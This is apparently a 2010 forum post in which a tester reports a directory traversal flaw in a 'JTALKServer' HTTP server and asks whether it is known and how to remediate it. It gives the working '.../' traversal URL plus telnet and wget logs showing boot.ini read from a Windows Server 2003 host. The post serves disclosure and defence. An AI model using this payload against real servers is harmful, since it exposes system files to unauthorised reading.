Hello All, Does anyone know of any Directory Traversal issue with Jtalk HTTP server? I was testing one of my machine and found directory traversal on it. http://192.168.10.120/.../.../.../.../.../.../.../.../.../boot.ini Tried to enumerate the version but failed, attached below are the logs - =============Header enumeration============= [jt@secBox]$ telnet 192.168.10.120 80 Trying 192.168.10.120... Connected to 192.168.10.120 (192.168.10.120). Escape character is '^]'. GET / HTTP/1.0 HTTP/1.0 404 Not Found Server: JTALKServer Allow: GET Content-Type: text/html Content-Length:87 <HTML> <HEAD> </HEAD> <BODY> <H1>HTTP Error 404</H1> <H4>Not Found</H4> </BODY> </HTML>Connection closed by foreign host. ==============End Header Enumeration=============== Attached below are the logs for wget when I downloaded the boot.ini file =========wget logs============== [jt@secBox]$ wget http://192.168.10.120/.../.../.../.../.../.../.../.../.../boot.ini --2010-06-30 15:58:45-- http://192.168.10.120/.../.../.../.../.../.../.../.../.../boot.ini Connecting to 192.168.10.120:80... connected. HTTP request sent, awaiting response... 200 OK Length: 208 [application/octet-stream] Saving to: `boot.ini' 100%[====================================================================================================================>] 208 --.-K/s in 0s 2010-06-30 15:58:45 (10.9 MB/s) - `boot.ini' saved [208/208] [jt@secBox]$ cat boot.ini [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Standard" /noexecute=optout /fastdetect [jt@secBox]$ ============end of logs===================== So my question is does anyone know of any such issue? What could be the remediation apart from disabling the service? Thanks Joshua